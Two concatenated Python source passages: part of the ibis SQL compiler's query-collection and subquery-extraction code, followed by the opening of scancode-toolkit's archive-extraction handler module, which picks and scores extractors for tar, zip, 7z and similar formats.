        self.table_set = self.table_set.semi_join(rank_set, [pred])
        return None
# ---------------------------------------------------------------------
# Analysis of table set
    def _collect_elements(self):
        """Seed table_set/select_set by walking the query expression root."""
        # If expr is a ValueExpr, we must seek out the TableExprs that it
        # references, build their ASTs, and mark them in our QueryContext
        # For now, we need to make the simplifying assumption that a value
        # expression that is being translated only depends on a single table
        # expression.
        source_expr = self.query_expr
        # hm, is this the best place for this?
        root_op = source_expr.op()
        if (isinstance(root_op, ops.Join) and
                not isinstance(root_op, ops.MaterializedJoin)):
            # Unmaterialized join
            source_expr = source_expr.materialize()
        if isinstance(root_op, ops.TableNode):
            self._collect(source_expr, toplevel=True)
            if self.table_set is None:
                raise com.InternalError('no table set')
        else:
            # value expression root: select it directly
            if isinstance(root_op, ir.ExpressionList):
                self.select_set = source_expr.exprs()
            else:
                self.select_set = [source_expr]
    def _collect(self, expr, toplevel=False):
        """Dispatch to the _collect_<OpName> visitor for *expr*'s root op."""
        op = expr.op()
        method = '_collect_{0}'.format(type(op).__name__)
        # Do not visit nodes twice
        if op in self.op_memo:
            return
        if hasattr(self, method):
            f = getattr(self, method)
            f(expr, toplevel=toplevel)
        elif isinstance(op, (ops.PhysicalTable, ops.SQLQueryResult)):
            self._collect_PhysicalTable(expr, toplevel=toplevel)
        elif isinstance(op, (ops.Join, ops.MaterializedJoin)):
            self._collect_Join(expr, toplevel=toplevel)
        else:
            raise NotImplementedError(type(op))
        self.op_memo.add(op)
def _collect_Aggregation(self, expr, toplevel=False):
    """Collect an Aggregation node into the SELECT parts.

    The select set includes the grouping keys (if any), and these are
    duplicated in the group_by set. SQL translator can decide how to
    format these depending on the database. Most likely the
    GROUP BY 1, 2, ... style.
    """
    if toplevel:
        subbed_expr = self._sub(expr)
        sub_op = subbed_expr.op()

        # Materialize the positions as a list: on Python 3, range()
        # returns a lazy object, whereas downstream formatting expects
        # the indexable/concatenable list Python 2's range() produced.
        self.group_by = list(range(len(sub_op.by)))
        self.having = sub_op.having
        self.select_set = sub_op.by + sub_op.agg_exprs
        self.table_set = sub_op.table

    self._collect(expr.op().table)
def _collect_Distinct(self, expr, toplevel=False):
    """At the query root, a Distinct node means SELECT DISTINCT."""
    node = expr.op()
    if toplevel:
        self.distinct = True
    self._collect(node.table, toplevel=toplevel)
def _collect_Filter(self, expr, toplevel=False):
    # Filter predicates accumulate into the WHERE clause no matter where
    # in the tree the Filter node appears.
    op = expr.op()

    self.filters.extend(op.predicates)
    if toplevel:
        # The filtered table supplies both the select set and table set.
        self.select_set = [op.table]
        self.table_set = op.table

    self._collect(op.table)
def _collect_Limit(self, expr, toplevel=False):
    """Record LIMIT/OFFSET when the Limit node is the query root."""
    if not toplevel:
        return
    node = expr.op()
    self.limit = {'n': node.n, 'offset': node.offset}
    self._collect(node.table, toplevel=toplevel)
def _collect_SortBy(self, expr, toplevel=False):
    # Sort keys become the ORDER BY clause.
    op = expr.op()

    self.sort_by = op.keys
    if toplevel:
        # HACK: yuck, need a better way to know if we should perform a
        # select * from a subquery here
        if not isinstance(op.table.op(), ops.Aggregation):
            self.select_set = [op.table]
            self.table_set = op.table
            # The child has supplied select/table set, so it is no
            # longer visited as the top level of the query.
            toplevel = False

    self._collect(op.table, toplevel=toplevel)
def _collect_Join(self, expr, toplevel=False):
    # Handles both Join and MaterializedJoin; the latter is unwrapped to
    # the join it materializes before processing.
    op = expr.op()

    if isinstance(op, ops.MaterializedJoin):
        expr = op.join
        op = expr.op()

    if toplevel:
        # Substitute parents so the joined table set refers to any
        # already-extracted subquery aliases.
        subbed = self._sub(expr)
        self.table_set = subbed
        self.select_set = [op.left, op.right]

    # Join children are never the top level of the query.
    self._collect(op.left, toplevel=False)
    self._collect(op.right, toplevel=False)
def _collect_Union(self, expr, toplevel=False):
    """UNION is not yet supported as a top-level query construct."""
    if toplevel:
        raise NotImplementedError
def _collect_Projection(self, expr, toplevel=False):
    # A projection at the root supplies the SELECT list directly.
    op = expr.op()

    if toplevel:
        subbed = self._sub(expr)
        sop = subbed.op()

        self.select_set = sop.selections
        self.table_set = sop.table

    self._collect(op.table)
def _collect_PhysicalTable(self, expr, toplevel=False):
    """A concrete table at the root is simply SELECT * FROM table."""
    if not toplevel:
        return
    self.select_set = [expr]
    self.table_set = self._sub(expr)
def _collect_SelfReference(self, expr, toplevel=False):
    """A self-reference is transparent: visit the table it aliases."""
    if toplevel:
        self._collect(expr.op().table, toplevel=toplevel)
def _sub(self, what):
    """Substitute parent tables (sharing this query's memo) in a single
    expression, or element-wise across a list of expressions."""
    memo = self.sub_memo
    if not isinstance(what, list):
        return L.substitute_parents(what, memo)
    return [L.substitute_parents(item, memo) for item in what]
# --------------------------------------------------------------------
# Subquery analysis / extraction
def _analyze_subqueries(self):
    """Locate subqueries in this query and record which to extract.

    Selected subqueries are appended to ``self.subqueries`` and marked
    as extracted in the query context so parent/child contexts do not
    extract the same subquery twice.
    """
    # Somewhat temporary place for this. A little bit tricky, because
    # subqueries can be found in many places
    # - With the table set
    # - Inside the where clause (these may be able to place directly, some
    #   cases not)
    # - As support queries inside certain expressions (possibly needing to
    #   be extracted and joined into the table set where they are
    #   used). More complex transformations should probably not occur here,
    #   though.
    #
    # Duplicate subqueries might appear in different parts of the query
    # structure, e.g. beneath two aggregates that are joined together, so
    # we have to walk the entire query structure.
    #
    # The default behavior is to only extract into a WITH clause when a
    # subquery appears multiple times (for DRY reasons). At some point we
    # can implement a more aggressive policy so that subqueries always
    # appear in the WITH part of the SELECT statement, if that's what you
    # want.

    # Find the subqueries, and record them in the passed query context.
    subqueries = _extract_subqueries(self)
    self.subqueries = []
    for expr in subqueries:
        # See #173. Might have been extracted already in a parent context.
        if not self.context.is_extracted(expr):
            self.subqueries.append(expr)
            self.context.set_extracted(expr)
def _extract_subqueries(select_stmt):
    """Return the subquery expressions to extract from ``select_stmt``."""
    return _ExtractSubqueries(select_stmt).get_result()
def _extract_noop(self, expr):
    # Shared no-op visitor: leaf nodes contain no extractable subqueries.
    return
class _ExtractSubqueries(object):
    """Walk a query's table set and filter clauses counting repeated
    table expressions.

    Expressions observed more than once (or every observed expression,
    when ``greedy`` is True) are reported for extraction into a WITH
    clause by :meth:`get_result`.
    """
    # Helper class to make things a little easier

    def __init__(self, query, greedy=False):
        self.query = query
        self.greedy = greedy

        # Ordered set that uses object .equals to find keys
        self.observed_exprs = util.IbisMap()
        self.expr_counts = defaultdict(lambda: 0)

    def get_result(self):
        """Return the list of expressions to extract, innermost first."""
        if self.query.table_set is not None:
            self.visit(self.query.table_set)

        for clause in self.query.filters:
            self.visit(clause)

        to_extract = []

        # Read them inside-out, to avoid nested dependency issues
        #
        # BUG FIX: on Python 3, zip() returns a one-shot iterator that
        # reversed() rejects with a TypeError; materialize the pairs as
        # a list first (a no-op on Python 2, where zip returns a list).
        pairs = list(zip(self.observed_exprs.keys,
                         self.observed_exprs.values))
        for expr, key in reversed(pairs):
            v = self.expr_counts[key]
            if self.greedy or v > 1:
                to_extract.append(expr)

        return to_extract

    def observe(self, expr):
        """Record one sighting of expr, keyed by structural equality."""
        if expr in self.observed_exprs:
            key = self.observed_exprs.get(expr)
        else:
            # this key only needs to be unique because of the IbisMap
            key = id(expr.op())
            self.observed_exprs.set(expr, key)

        self.expr_counts[key] += 1

    def _has_been_observed(self, expr):
        return expr in self.observed_exprs

    def visit(self, expr):
        # Dispatch to a node-type-specific visitor when one exists;
        # otherwise fall back to the structural cases below.
        node = expr.op()
        method = '_visit_{0}'.format(type(node).__name__)

        if hasattr(self, method):
            f = getattr(self, method)
            f(expr)
        elif isinstance(node, ops.Join):
            self._visit_join(expr)
        elif isinstance(node, ops.PhysicalTable):
            self._visit_physical_table(expr)
        elif isinstance(node, ops.ValueNode):
            for arg in node.flat_args():
                if not isinstance(arg, ir.Expr):
                    continue
                self.visit(arg)
        else:
            raise NotImplementedError(type(node))

    def _visit_join(self, expr):
        node = expr.op()
        self.visit(node.left)
        self.visit(node.right)

    # Leaf nodes: nothing to extract.
    _visit_physical_table = _extract_noop
    _visit_ExistsSubquery = _extract_noop
    _visit_NotExistsSubquery = _extract_noop

    def _visit_Aggregation(self, expr):
        self.observe(expr)
        self.visit(expr.op().table)

    def _visit_Distinct(self, expr):
        self.observe(expr)

    def _visit_Filter(self, expr):
        self.visit(expr.op().table)

    def _visit_Limit(self, expr):
        self.visit(expr.op().table)

    def _visit_Union(self, expr):
        self.observe(expr)

    def _visit_Projection(self, expr):
        self.observe(expr)
        self.visit(expr.op().table)

    def _visit_SQLQueryResult(self, expr):
        self.observe(expr)

    def _visit_TableColumn(self, expr):
        table = expr.op().table
        if not self._has_been_observed(table):
            self.visit(table)

    def _visit_SelfReference(self, expr):
        self.visit(expr.op().table)

    def _visit_SortBy(self, expr):
        self.observe(expr)
        self.visit(expr.op().table)
def _foreign_ref_check(query, expr):
    """Return True if ``expr`` correlates a subquery with the query roots."""
    return _CorrelatedRefCheck(query, expr).get_result()
class _CorrelatedRefCheck(object):
    """Determine whether an expression is correlated with the enclosing
    query: i.e. it references both one of the query's own root tables
    and a foreign table from within a subquery position."""

    def __init__(self, query, expr):
        self.query = query
        self.ctx = query.context
        self.expr = expr

        qroots = self.query.table_set._root_tables()

        self.query_roots = util.IbisSet.from_list(qroots)

        # aliasing required
        self.foreign_refs = []

        self.has_foreign_root = False
        self.has_query_root = False

    def get_result(self):
        # Correlated iff both a query root and a foreign root were seen
        # in subquery positions during the walk.
        self._visit(self.expr)
        return self.has_query_root and self.has_foreign_root

    def _visit(self, expr, in_subquery=False):
        node = expr.op()

        # NOTE(review): the in_subquery argument is overwritten here, so
        # any True value passed by the caller is discarded for this node;
        # later revisions use ``in_subquery or self._is_subquery(node)``.
        # Confirm intended behavior before changing.
        in_subquery = self._is_subquery(node)

        for arg in node.flat_args():
            if isinstance(arg, ir.TableExpr):
                self._visit_table(arg, in_subquery=in_subquery)
            elif isinstance(arg, ir.Expr):
                self._visit(arg, in_subquery=in_subquery)
            else:
                continue

    def _is_subquery(self, node):
        # XXX
        if isinstance(node, ops.TableArrayView):
            return True

        if isinstance(node, ops.TableColumn):
            return not self._is_root(node.table)

        return False

    def _visit_table(self, expr, in_subquery=False):
        node = expr.op()

        if isinstance(node, (ops.PhysicalTable, ops.SelfReference)):
            self._ref_check(node, in_subquery=in_subquery)

        for arg in node.flat_args():
            if isinstance(arg, ir.Expr):
                self._visit(arg, in_subquery=in_subquery)

    def _ref_check(self, node, in_subquery=False):
        # Track whether this table is one of the query's own roots or a
        # foreign table; foreign tables inside subqueries force aliasing
        # in the surrounding context.
        is_aliased = self.ctx.has_alias(node)

        if self._is_root(node):
            if in_subquery:
                self.has_query_root = True
        else:
            if in_subquery:
                self.has_foreign_root = True
                if (not is_aliased and
                        self.ctx.has_alias(node, parent_contexts=True)):
                    self.ctx.make_alias(node)
            elif not self.ctx.has_alias(node):
                self.ctx.make_alias(node)

    def _is_root(self, what):
        if isinstance(what, ir.Expr):
            what = what.op()
        return what in self.query_roots
def _adapt_expr(expr):
    """Adapt a non-table expression to a well-formed table expression.

    Returns a (table_expr, result_handler) pair: the table expression to
    execute, and a callable mapping the raw results to the arity the
    caller expects (scalar, column, or table).
    """
    # Non-table expressions need to be adapted to some well-formed table
    # expression, along with a way to adapt the results to the desired
    # arity (whether array-like or scalar, for example)
    #
    # Canonical case is scalar values or arrays produced by some reductions
    # (simple reductions, or distinct, say)
    def as_is(x):
        return x

    if isinstance(expr, ir.TableExpr):
        return expr, as_is

    def _scalar_reduce(x):
        return isinstance(x, ir.ScalarExpr) and ops.is_reduction(x)

    if isinstance(expr, ir.ScalarExpr):

        def scalar_handler(results):
            # single-row, single-column result named 'tmp'
            return results['tmp'][0]

        if _scalar_reduce(expr):
            table_expr = _reduction_to_aggregation(expr, agg_name='tmp')
            return table_expr, scalar_handler
        else:
            base_table = L.find_base_table(expr)
            if base_table is None:
                # expr with no table refs
                return expr.name('tmp'), scalar_handler
            else:
                raise NotImplementedError(expr._repr())
    elif isinstance(expr, ir.ExprList):
        exprs = expr.exprs()

        is_aggregation = True
        any_aggregation = False

        # Mixed lists (some reductions, some not) are not supported.
        for x in exprs:
            if not _scalar_reduce(x):
                is_aggregation = False
            else:
                any_aggregation = True

        if is_aggregation:
            table = L.find_base_table(exprs[0])
            return table.aggregate(exprs), as_is
        elif not any_aggregation:
            return expr, as_is
        else:
            raise NotImplementedError(expr._repr())
    elif isinstance(expr, ir.ArrayExpr):
        op = expr.op()

        def _get_column(name):
            def column_handler(results):
                return results[name]
            return column_handler

        if isinstance(op, ops.TableColumn):
            # Plain column reference: project from its own table.
            table_expr = op.table
            result_handler = _get_column(op.name)
        else:
            # Something more complicated.
            base_table = L.find_source_table(expr)

            if isinstance(op, ops.DistinctArray):
                expr = op.arg
                try:
                    name = op.arg.get_name()
                except Exception:
                    # fall back on a generated column name
                    name = 'tmp'
                table_expr = (base_table.projection([expr.name(name)])
                              .distinct())
                result_handler = _get_column(name)
            else:
                table_expr = base_table.projection([expr.name('tmp')])
                result_handler = _get_column('tmp')

        return table_expr, result_handler
    else:
        raise NotImplementedError
def _reduction_to_aggregation(expr, agg_name='tmp'):
    """Wrap a scalar reduction in an aggregation over its base table."""
    named = expr.name(agg_name)
    return L.find_base_table(expr).aggregate([named])
|
o0neup/ibis
|
ibis/sql/compiler.py
|
Python
|
apache-2.0
| 27,343
|
[
"VisIt"
] |
90b7b6f5a2a29b35a3d4c55adbe8c09b690e674d94c00273e4cd5f4177c2ca43
|
#
# Copyright (c) 2016 nexB Inc. and others. All rights reserved.
# http://nexb.com and https://github.com/nexB/scancode-toolkit/
# The ScanCode software is licensed under the Apache License version 2.0.
# Data generated with ScanCode require an acknowledgment.
# ScanCode is a trademark of nexB Inc.
#
# You may not use this software except in compliance with the License.
# You may obtain a copy of the License at: http://apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software distributed
# under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
# CONDITIONS OF ANY KIND, either express or implied. See the License for the
# specific language governing permissions and limitations under the License.
#
# When you publish or redistribute any data created with ScanCode or any ScanCode
# derivative work, you must accompany this data with the following acknowledgment:
#
# Generated with ScanCode and provided on an "AS IS" BASIS, WITHOUT WARRANTIES
# OR CONDITIONS OF ANY KIND, either express or implied. No content created from
# ScanCode should be considered or used as legal advice. Consult an Attorney
# for any legal advice.
# ScanCode is a free software code scanning tool from nexB Inc. and others.
# Visit https://github.com/nexB/scancode-toolkit/ for support and download.
from __future__ import absolute_import
from __future__ import print_function
from __future__ import unicode_literals
from collections import namedtuple
import functools
import logging
import os
from commoncode import fileutils
from commoncode import filetype
import typecode
from extractcode import all_kinds
from extractcode import regular
from extractcode import package
from extractcode import docs
from extractcode import regular_nested
from extractcode import file_system
from extractcode import patches
from extractcode import special_package
from extractcode import patch
from extractcode import sevenzip
from extractcode import libarchive2
from extractcode.uncompress import uncompress_gzip
from extractcode.uncompress import uncompress_bzip2
# Module logger; TRACE/TRACE_DEEP gate debug logging of handler selection.
logger = logging.getLogger(__name__)
TRACE = False
TRACE_DEEP = False

if TRACE:
    import sys
    logging.basicConfig(stream=sys.stdout)
    logger.setLevel(logging.DEBUG)
"""
Archive formats handling. The purpose of this module is to select an extractor
suitable for the accurate extraction of a given kind of archive. An extractor is
a function that can read an archive and extract it to a directory. Multiple
extractors functions can be called in sequence to handle nested archives such
as tar.gz.
A handler contains selection criteria and a list of extractors.
We select an extraction handler based on these criteria:
- file type,
- mime type,
- file extension,
- kind of archive.
Several handlers may be suitable candidates for extraction of a given archive.
Candidates are scored and the best one picked which is typically the most
specific and the one capable of doing the deepest extraction of a given archive.
At the lowest level, archives are processed by standard library code (sometimes
patched) or native code (libarchive, 7zip).
For background on archive and compressed file formats see:
- http://en.wikipedia.org/wiki/List_of_archive_formats
- http://en.wikipedia.org/wiki/List_of_file_formats#Archive_and_compressed
"""
# if strict, all handler criteria must be matched for it to be selected
Handler = namedtuple('Handler', ['name', 'filetypes', 'mimetypes', 'extensions', 'kind', 'extractors', 'strict'])
def can_extract(location):
    """
    Return True if this location can be extracted by some handler, False
    otherwise.

    The original fell off the end returning an implicit None; an explicit
    boolean is returned instead (both are falsy, so callers are unaffected).
    """
    for _handler in get_handlers(location):
        return True
    return False
def should_extract(location, kinds):
    """
    Return True if this location should be extracted based on the provided
    kinds, False otherwise.

    Returns an explicit boolean instead of the original implicit None on
    the no-extractor path (both falsy, so callers are unaffected).
    """
    location = os.path.abspath(os.path.expanduser(location))
    # get_extractor returns a callable (always truthy) or None
    return get_extractor(location, kinds) is not None
def get_extractor(location, kinds=all_kinds):
    """
    Return an extraction callable that can extract the file at `location`,
    or None if no extract function is found.
    """
    assert location
    location = os.path.abspath(os.path.expanduser(location))

    extractors = get_extractors(location, kinds)
    count = len(extractors)
    if count == 1:
        return extractors[0]
    if count == 2:
        # chain the two extractors for nested archives (e.g. tar.gz)
        first, second = extractors
        return functools.partial(extract_twice,
                                 extractor1=first,
                                 extractor2=second)
    return None
def get_extractors(location, kinds=all_kinds):
    """
    Return the list of extractors that can extract the file at `location`,
    or an empty list if no handler applies.
    """
    handler = get_best_handler(location, kinds)
    if handler:
        return handler.extractors
    return []
def get_best_handler(location, kinds=all_kinds):
    """
    Return the best handler, or None, for the file at location.
    """
    location = os.path.abspath(os.path.expanduser(location))
    if not filetype.is_file(location):
        return
    handlers = list(get_handlers(location))
    if handlers:
        candidates = score_handlers(handlers)
        # pick_best_handler may still return None if the winner's kind is
        # not in the requested `kinds`
        return candidates and pick_best_handler(candidates, kinds)
def get_handlers(location):
    """
    Return an iterable of (handler, type_matched, mime_matched,
    extension_matched,) for this `location`.
    """
    if filetype.is_file(location):
        T = typecode.contenttype.get_type(location)
        ftype = T.filetype_file.lower()
        mtype = T.mimetype_file

        for handler in archive_handlers:
            if not handler.extractors:
                continue

            extractor_count = len(handler.extractors)
            if extractor_count > 2:
                raise Exception('Maximum level of archive nesting is two.')

            # default to False
            type_matched = handler.filetypes and any(t in ftype for t in handler.filetypes)
            mime_matched = handler.mimetypes and any(m in mtype for m in handler.mimetypes)
            extension_matched = handler.extensions and location.lower().endswith(handler.extensions)

            if TRACE_DEEP:
                handler_name = handler.name
                logger.debug('get_handlers: considering %(handler_name)r handler for %(location)s: ftype: %(ftype)s, mtype: %(mtype)s ' % locals())
                logger.debug('get_handlers: %(location)s: matched type: %(type_matched)s, mime: %(mime_matched)s, ext: %(extension_matched)s' % locals())

            # strict handlers require every criterion to match
            if handler.strict and not all([type_matched, mime_matched, extension_matched]):
                continue

            if type_matched or mime_matched or extension_matched:
                if TRACE_DEEP:
                    logger.debug('get_handlers: %(location)s: matched type: %(type_matched)s, mime: %(mime_matched)s, ext: %(extension_matched)s' % locals())
                    logger.debug('get_handlers: %(location)s: handler: %(handler)r' % locals())
                yield handler, type_matched, mime_matched, extension_matched
def score_handlers(handlers):
    """
    Score candidate handlers. Higher score is better.

    Yields (score, handler, extension_matched) triples for handlers with a
    positive score.
    """
    for handler, type_matched, mime_matched, extension_matched in handlers:
        score = 0
        # increment kind value: higher kinds numerical values are more
        # specific by design
        score += handler.kind

        # increment score based on matched criteria
        if type_matched and mime_matched and extension_matched:
            # bump for matching all criteria
            score += 10
        if type_matched:
            # type is more specific than mime
            score += 8
        if mime_matched:
            score += 6
        if extension_matched:
            # extensions have little power
            score += 2

        if extension_matched and not (type_matched or mime_matched):
            # extension matched alone should not be extracted
            score -= 100

        # increment using the number of extractors: higher score means that we
        # have some kind of nested archive that we can extract in one
        # operation, therefore more this is a more specific extraction that we
        # should prefer. For instance we prefer uncompressing and extracting a
        # tgz at once, rather than uncompressing in a first operation then
        # later extracting the plain tar in a second operation
        score += len(handler.extractors)

        if score > 0:
            yield score, handler, extension_matched
def pick_best_handler(candidates, kinds):
    """
    Return the best handler with the highest score.
    In case of ties, look at the top two handlers and keep:
    - the handler with the most extractors (i.e. a handler that does deeper
      nested extractions),
    - OR the handler that has matched extensions,
    - OR finally the first handler in the list.
    """
    # sort by decreasing scores (reverse=True), best first
    scored = sorted(candidates, reverse=True)
    if not scored:
        return

    top_score, top, top_ext = scored[0]
    # logger.debug('pick_best_handler: top: %(top)r\n' % locals())

    # single candidate case
    if len(scored) == 1:
        return top if top.kind in kinds else None

    # else: here we have 2 or more candidates: look at the runner up.
    runner_up_score, runner_up, runner_up_ext = scored[1]
    # logger.debug('pick_best_handler: runner_up: %(runner_up)r\n' % locals())

    # return the top scoring if there is score ties.
    if top_score > runner_up_score:
        return top if top.kind in kinds else None

    # else: with sorting top_score == runner_up_score by construction here

    # break ties based on number of extractors
    if len(top.extractors) > len(runner_up.extractors):
        return top if top.kind in kinds else None
    elif len(top.extractors) < len(runner_up.extractors):
        return runner_up if runner_up.kind in kinds else None

    # else: here len(top.extractors) == len(runner_up.extractors)
    # now, break ties based on extensions being matched
    if top_ext and not runner_up_ext:
        return top if top.kind in kinds else None
    elif runner_up_ext and not top_ext:
        return runner_up if runner_up.kind in kinds else None

    # else: we could not break ties. finally return the top
    return top if top.kind in kinds else None
def extract_twice(location, target_dir, extractor1, extractor2):
    """
    Extract a nested compressed archive at `location` to `target_dir` using
    the `extractor1` function to a temporary directory then the `extractor2`
    function on the extracted payload of `extractor1`.

    Return a list of warning messages. Raise exceptions on errors.

    Typical nested archives include compressed tarballs and RPMs (containing a
    compressed cpio).

    Note: it would be easy to support deeper extractor chains, but this gets
    hard to trace and debug very quickly. A depth of two is simple and sane and
    covers most common cases.
    """
    abs_location = os.path.abspath(os.path.expanduser(location))
    abs_target_dir = unicode(os.path.abspath(os.path.expanduser(target_dir)))
    # extract first the intermediate payload to a temp dir
    temp_target = unicode(fileutils.get_temp_dir('extract'))
    warnings = extractor1(abs_location, temp_target)
    if TRACE:
        logger.debug('extract_twice: temp_target: %(temp_target)r' % locals())

    # extract this intermediate payload to the final target_dir
    try:
        inner_archives = list(fileutils.file_iter(temp_target))
        if not inner_archives:
            warnings.append(location + ': No files found in archive.')
        else:
            # each file produced by the first pass is fed to extractor2
            for extracted1_loc in inner_archives:
                if TRACE:
                    logger.debug('extract_twice: extractor2: %(extracted1_loc)r' % locals())
                warnings.extend(extractor2(extracted1_loc, abs_target_dir))
    finally:
        # cleanup the temporary output from extractor1
        fileutils.delete(temp_target)
    return warnings
def extract_with_fallback(location, target_dir, extractor1, extractor2):
    """
    Extract archive at `location` to `target_dir` trying first `extractor1` function.
    If extract fails, attempt extraction again with the `extractor2` function.
    Return a list of warning messages. Raise exceptions on errors.

    Note: there are a few cases where the primary extractor for a type may fail and
    a secondary extractor will succeed.
    """
    abs_location = os.path.abspath(os.path.expanduser(location))
    abs_target_dir = unicode(os.path.abspath(os.path.expanduser(target_dir)))
    # attempt extract first to a temp dir
    temp_target1 = unicode(fileutils.get_temp_dir('extract1'))
    try:
        warnings = extractor1(abs_location, temp_target1)
        if TRACE:
            logger.debug('extract_with_fallback: temp_target1: %(temp_target1)r' % locals())
        fileutils.copytree(temp_target1, abs_target_dir)
    # FIX: catch Exception rather than a bare `except:` so that
    # KeyboardInterrupt/SystemExit abort the extraction instead of
    # silently triggering the fallback extractor.
    except Exception:
        # FIX: create the second temp dir before entering the inner try;
        # previously a failure in get_temp_dir left temp_target2 unbound
        # and the `finally` raised a NameError masking the real error.
        temp_target2 = unicode(fileutils.get_temp_dir('extract2'))
        try:
            warnings = extractor2(abs_location, temp_target2)
            if TRACE:
                logger.debug('extract_with_fallback: temp_target2: %(temp_target2)r' % locals())
            fileutils.copytree(temp_target2, abs_target_dir)
        finally:
            fileutils.delete(temp_target2)
    finally:
        fileutils.delete(temp_target1)
    return warnings
def try_to_extract(location, target_dir, extractor):
    """
    Extract archive at `location` to `target_dir` trying the `extractor` function.
    If extract fails, just return without returning warnings nor raising exceptions.

    Note: there are a few cases where we want to attempt extracting something
    but do not care if this fails.
    """
    abs_location = os.path.abspath(os.path.expanduser(location))
    abs_target_dir = unicode(os.path.abspath(os.path.expanduser(target_dir)))
    temp_target = unicode(fileutils.get_temp_dir('extract1'))
    warnings = []
    try:
        warnings = extractor(abs_location, temp_target)
        if TRACE:
            logger.debug('try_to_extract: temp_target: %(temp_target)r' % locals())
        fileutils.copytree(temp_target, abs_target_dir)
    # FIX: catch Exception rather than a bare `except:` so that
    # KeyboardInterrupt/SystemExit still propagate instead of being
    # silently swallowed as a "failed extraction".
    except Exception:
        return warnings
    finally:
        fileutils.delete(temp_target)
    return warnings
# High level aliases to lower level extraction functions
########################################################
extract_tar = libarchive2.extract
extract_patch = patch.extract
extract_deb = libarchive2.extract
extract_ar = libarchive2.extract
extract_msi = sevenzip.extract
extract_cpio = libarchive2.extract

# sevenzip should be best at extracting 7zip but most often libarchive is better first
extract_7z = functools.partial(extract_with_fallback, extractor1=libarchive2.extract, extractor2=sevenzip.extract)

# libarchive is best for the run of the mill zips, but sevenzip sometimes is better
extract_zip = functools.partial(extract_with_fallback, extractor1=libarchive2.extract, extractor2=sevenzip.extract)

# springboot jars are zips with a script header: extraction may fail and is best-effort
extract_springboot = functools.partial(try_to_extract, extractor=extract_zip)

# formats handled by 7zip only
extract_iso = sevenzip.extract
extract_rar = sevenzip.extract
extract_rpm = sevenzip.extract
extract_xz = sevenzip.extract
extract_lzma = sevenzip.extract
extract_squashfs = sevenzip.extract
extract_cab = sevenzip.extract
extract_nsis = sevenzip.extract
extract_ishield = sevenzip.extract
extract_Z = sevenzip.extract
extract_xarpkg = sevenzip.extract
# Archive handlers.
####################
# Plain (uncompressed) tarballs.
TarHandler = Handler(
    name='Tar',
    filetypes=('.tar', 'tar archive',),
    mimetypes=('application/x-tar',),
    extensions=('.tar',),
    kind=regular,
    extractors=[extract_tar],
    strict=False
)

# Ruby gems are tar archives carrying a .gem extension.
RubyGemHandler = Handler(
    name='Ruby Gem package',
    filetypes=('.tar', 'tar archive',),
    mimetypes=('application/x-tar',),
    extensions=('.gem',),
    kind=package,
    extractors=[extract_tar],
    strict=False
)
ZipHandler = Handler(
name='Zip',
filetypes=('zip archive',),
mimetypes=('application/zip',),
extensions=('.zip', '.zipx',),
kind=regular,
extractors=[extract_zip],
strict=False
)
OfficeDocHandler = Handler(
name='Office doc',
filetypes=('zip archive',),
mimetypes=('application/zip', 'application/vnd.openxmlformats',),
# Extensions of office documents that are zip files too
extensions=(
# ms doc
'.docx', '.dotx', '.docm',
# ms xls
'.xlsx', '.xltx', '.xlsm', '.xltm',
# ms ppt
'.pptx', '.ppsx', '.potx', '.pptm', '.potm', '.ppsm',
# oo write
'.odt', '.odf', '.sxw', '.stw',
# oo calc
'.ods', '.ots', '.sxc', '.stc',
# oo pres and draw
'.odp', '.otp', '.odg', '.otg', '.sxi', '.sti', '.sxd',
'.sxg', '.std',
# star office
'.sdc', '.sda', '.sdd', '.smf', '.sdw', '.sxm', '.stw',
'.oxt', '.sldx',
'.epub',
),
kind=docs,
extractors=[extract_zip],
strict=True
)
AndroidAppHandler = Handler(
name='Android app',
filetypes=('zip archive',),
mimetypes=('application/zip',),
extensions=('.apk',),
kind=package,
extractors=[extract_zip],
strict=True
)
# see http://tools.android.com/tech-docs/new-build-system/aar-formats
AndroidLibHandler = Handler(
name='Android library',
filetypes=('zip archive',),
mimetypes=('application/zip',),
# note: Apache Axis also uses AAR extensions for plain Jars
extensions=('.aar',),
kind=package,
extractors=[extract_zip],
strict=True
)
MozillaExtHandler = Handler(
name='Mozilla extension',
filetypes=('zip archive',),
mimetypes=('application/zip',),
extensions=('.xpi',),
kind=package,
extractors=[extract_zip],
strict=True
)
# see https://developer.chrome.com/extensions/crx
# not supported for now
ChromeExtHandler = Handler(
name='Chrome extension',
filetypes=('data',),
mimetypes=('application/octet-stream',),
extensions=('.crx',),
kind=package,
extractors=[extract_7z],
strict=True
)
IosAppHandler = Handler(
name='iOS app',
filetypes=('zip archive',),
mimetypes=('application/zip',),
extensions=('.ipa',),
kind=package,
extractors=[extract_zip],
strict=True
)
JavaJarHandler = Handler(
name='Java Jar package',
filetypes=('java archive',),
mimetypes=('application/java-archive',),
extensions=('.jar', '.zip',),
kind=package,
extractors=[extract_zip],
strict=False
)
# See https://projects.spring.io/spring-boot/
# this is a ZIP with a shell header (e.g. a self-executing zip of sorts)
# internally the zip is really a war rather than a jar
SpringBootShellJarHandler = Handler(
name='Springboot Java Jar package',
filetypes=('Bourne-Again shell script executable (binary data)',),
mimetypes=('text/x-shellscript',),
extensions=('.jar',),
kind=package,
extractors=[extract_springboot],
strict=False
)
JavaJarZipHandler = Handler(
name='Java Jar package',
filetypes=('zip archive',),
mimetypes=('application/zip',),
extensions=('.jar',),
kind=package,
extractors=[extract_zip],
strict=False
)
JavaWebHandler = Handler(
name='Java archive',
filetypes=('zip archive',),
mimetypes=('application/zip', 'application/java-archive',),
extensions=('.war', '.sar', '.ear',),
kind=regular,
extractors=[extract_zip],
strict=True
)
PythonHandler = Handler(
name='Python package',
filetypes=('zip archive',),
mimetypes=('application/zip',),
extensions=('.egg', '.whl', '.pyz', '.pex',),
kind=package,
extractors=[extract_zip],
strict=True
)
XzHandler = Handler(
name='xz',
filetypes=('xz compressed',),
mimetypes=('application/x-xz',) ,
extensions=('.xz',),
kind=regular,
extractors=[extract_xz],
strict=False
)
LzmaHandler = Handler(
name='lzma',
filetypes=('lzma compressed',),
mimetypes=('application/x-xz',) ,
extensions=('.lzma',),
kind=regular,
extractors=[extract_lzma],
strict=False
)
TarXzHandler = Handler(
name='Tar xz',
filetypes=('xz compressed',),
mimetypes=('application/x-xz',) ,
extensions=('.tar.xz', '.txz', '.tarxz',),
kind=regular_nested,
extractors=[extract_xz, extract_tar],
strict=False
)
TarLzmaHandler = Handler(
name='Tar lzma',
filetypes=('lzma compressed',),
